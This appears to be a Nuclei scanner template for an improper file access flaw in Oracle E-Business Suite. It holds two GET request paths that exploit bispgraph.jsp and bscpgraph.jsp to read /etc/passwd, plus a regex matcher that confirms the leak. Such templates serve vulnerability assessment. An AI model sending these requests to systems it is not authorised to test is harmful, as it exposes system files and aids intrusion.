id: oracle-ebs-bispgrapgh-file-read info: name: Oracle eBusiness Suite - Improper File Access author: emenalf,tirtha_mandal,thomas_from_offensity severity: critical description: | Oracle eBusiness Suite is susceptible to improper file access vulnerabilities via bispgrapgh. Be aware this product is no longer supported with patches or security fixes. reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf tags: oracle,lfi metadata: max-request: 2 http: - method: GET path: - "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/" - "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd" matchers: - type: regex part: body regex: - "root:.*:0:0:" # Enhanced by mp on 2022/05/26